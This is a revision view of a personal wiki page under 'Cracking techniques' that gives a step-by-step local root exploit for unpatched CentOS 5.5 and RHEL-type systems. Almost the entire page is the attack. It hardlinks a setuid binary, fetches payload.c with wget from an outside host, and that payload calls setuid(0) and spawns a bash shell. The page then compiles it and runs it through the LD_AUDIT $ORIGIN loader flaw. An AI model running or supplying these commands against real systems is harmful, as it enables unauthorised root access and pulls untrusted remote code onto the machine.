Difference between revisions of "Privilege escalation techniques"
From Notes_Wiki
(Created page with "=Privilege escalation techniques= ==Trick 1== This trick can be used on CentOS 5.5 machines which have not been updated even if SELinux is enabled. Machines updated after Oc...") |
m |
||
Line 1: | Line 1: | ||
<yambe:breadcrumb self="Privilege escalation techniques">Cracking techniques|Cracking techniques</yambe:breadcrumb> | |||
=Privilege escalation techniques= | =Privilege escalation techniques= | ||
Line 20: | Line 21: | ||
#gcc -w -fPIC -shared -o /tmp/exploit payload.c | #gcc -w -fPIC -shared -o /tmp/exploit payload.c | ||
#LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 | #LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 | ||
<yambe:breadcrumb self="Privilege escalation techniques">Cracking techniques|Cracking techniques</yambe:breadcrumb> |
Revision as of 05:28, 18 September 2018
<yambe:breadcrumb self="Privilege escalation techniques">Cracking techniques|Cracking techniques</yambe:breadcrumb>
Privilege escalation techniques
Trick 1
This trick can be used on CentOS 5.5 machines which have not been updated even if SELinux is enabled. Machines updated after October 2010 seem to be safe against this attack. This also works on Fedora / RHEL type of distributions.
- mkdir /tmp/exploit
- ln /bin/ping /tmp/exploit/target
- exec 3< /tmp/exploit/target
- rm -rf /tmp/exploit/
- wget pistol.clan.su/payload.c
- The payload.c file contains
- void __attribute__((constructor)) init()
- {
- setuid(0);
- system("/bin/bash");
- }
- gcc -w -fPIC -shared -o /tmp/exploit payload.c
- LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
<yambe:breadcrumb self="Privilege escalation techniques">Cracking techniques|Cracking techniques</yambe:breadcrumb>